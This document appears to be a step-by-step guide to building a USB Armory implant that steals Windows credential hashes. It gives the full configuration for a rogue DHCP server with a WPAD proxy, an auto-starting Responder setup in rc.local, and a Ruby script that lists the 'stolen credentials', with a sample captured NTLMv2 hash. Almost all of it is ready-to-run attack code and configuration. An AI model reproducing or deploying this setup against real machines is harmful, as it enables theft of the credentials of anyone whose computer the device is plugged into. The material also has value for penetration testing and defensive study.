Installing Image
wget -c wget -c https://github.com/inversepath/usbarmory-debian-base_image/releases/download/20170518/usbarmory-debian_jessie-base_image-20170518.raw.zip
fdisk -l
Burn the image on the microSDcard
dd if=usbarmory-debian_jessie-base_image-20170518.raw of=/dev/sdc bs=1M conv=fsync
Setting up repositories
nano /etc/apt/source.list
remove all current repos and add the following
###### Debian Main Repos
deb http://deb.debian.org/debian/ stable main contrib non-free
deb-src http://deb.debian.org/debian/ stable main contrib non-free
deb http://deb.debian.org/debian/ stable-updates main contrib non-free
deb-src http://deb.debian.org/debian/ stable-updates main contrib non-free
deb http://deb.debian.org/debian-security stable/updates main
deb-src http://deb.debian.org/debian-security stable/updates main
deb http://ftp.debian.org/debian jessie-backports main
deb-src http://ftp.debian.org/debian jessie-backports main
now update your repository
apt update
apt upgrade
Enable internet on USB aromory for
On your linux machine
iptables -I FORWARD -j ACCEPT
iptables -t nat -I POSTROUTING -o wls1 -j MASQUERADE
since wls1 is the internet facing interface
Bash autocompletion
apt install bash-completion
nano /etc/bash.bashrc
search for (ctrl+w)
# enable bash completion in interactive shells
Then uncomment the following lines (commented by default)
if ! shopt -oq posix; then
if [ -f /usr/share/bash-completion/bash_completion ]; then
. /usr/share/bash-completion/bash_completion
elif [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
fi
apply the changes
source /etc/bash.bashrc
Installing basic applications
System applications and liberaries
apt-get install -y curl git screen sqlite3 build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev autoconf postgresql pgadmin3 zlib1g-dev libxml2-dev libxslt1-dev libyaml-dev
Ruby
apt-get install -y ruby ruby-dev
gem install pry
Python
apt-get install -y python python-pip python-dev
pip install pycrypto
Attack Setup
Enable IP forwarding
- Enable kernel ip forwarding
nano /etc/sysctl.conf
uncomment the following line
net.ipv4.ip_forward=1
- Enable firewall masqurading
iptables -t nat -I POSTROUTING -o usb0 -j MASQUERADE
DHCPd setup
#
# Sample configuration file for ISC dhcpd for Debian
#
# have support for DDNS.
ddns-update-style none;
# option definitions common to all supported networks...
option domain-name "attacker.zone";
option domain-name-servers 10.0.0.1;
default-lease-time 600;
max-lease-time 7200;
# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative;
# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;
# wpad
option local-proxy-config code 252 = text;
# A slightly different configuration for an internal subnet.
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.2 10.0.0.3;
default-lease-time 60;
max-lease-time 72;
option routers 10.0.0.1;
option local-proxy-config "http://10.0.0.1/wpad.dat";
}
Responder setup
Download responder
mkdir /pentest
cd /pentest
git clone https://github.com/spiderlabs/responder
chmod +x Responder.py
Make startups
#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.
# Generate ssh host keys if missing
FILES=$(ls /etc/ssh/ssh_host_* 2> /dev/null | wc -l)
if [ "$FILES" = "0" ]; then
while [ $(cat /proc/sys/kernel/random/entropy_avail) -lt 256 ]; do
sleep 1;
done
/usr/sbin/dpkg-reconfigure openssh-server
fi
# Start DHCP server
if ! pgrep -x "dhcpd" > /dev/null
then
echo "Staring DHCPd" >> /root/rc.log
echo '' > /var/lib/dhcp/dhcpd.leases
/usr/sbin/dhcpd
fi
# Start Responder
echo "Staring Responder" >> /root/rc.log
/usr/bin/screen -dmS responder bash -c 'cd /pentest/responder/; python Responder.py -I usb0 -f -w -r -d -F'
echo "Staring cred watch" >> /root/rc.log
/usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /pentest/responder/Responder.db; do shutdown -h now; done'
exit 0
Post attack
To get all stolen credentials from responder, Go to /pentest/responder/Responder.db or use the following script to parse the outputs.
Install sqlite3 gem
gem install sqlite3
run the following script
#!/usr/bin/env ruby
#
# Responder database reader
#
require "sqlite3"
if ARGV.size == 1
responder_db = ARGV[0]
else
puts "Respnder.db path required!\nUsage: ruby responder-reader.rb /path/responder/Responder.db"
exit
end
# Open
db = SQLite3::Database.new responder_db
records = db.execute "SELECT * FROM responder;"
puts "[+] Number of recrods: #{records.size}"
sleep 1
records.each do |record|
puts "Timestamp: #{record[0]}"
puts "Module: #{record[1]}"
puts "HashType: #{record[2]}"
puts "IPaddress: #{record[3]}"
puts "Hostname: #{record[5].split('\\')[0]}"
puts "Username: #{record[5].split('\\')[1]}"
puts "Cleartext: #{record[6]}"
puts "Hash: #{record[7]}"
puts "Full Hash: #{record[8]}"
puts
end ruby responder-reader.rb /pentest/responder/Responder.db
result
[+] Number of recrods: 1
Timestamp: 2017-06-21 06:23:10
Module: HTTP
HashType: NTLMv2
IPaddress: 10.0.0.2
Hostname: DESKTOP-9INJ6LJ
Username: KING
Cleartext:
Hash: 8CVA8AFAF9909DA597CF3B7D84483438:0101000000000000241A342558EAD2013F8E3846E6C00698000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500.....
Full Hash: KING::DESKTOP-9INJ6LJ:1122334455667788:8CVA8AFAF9909DA597CF3B7D84483438:0101000000000000241A342558EAD2013F8E3846E6C00698000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500.....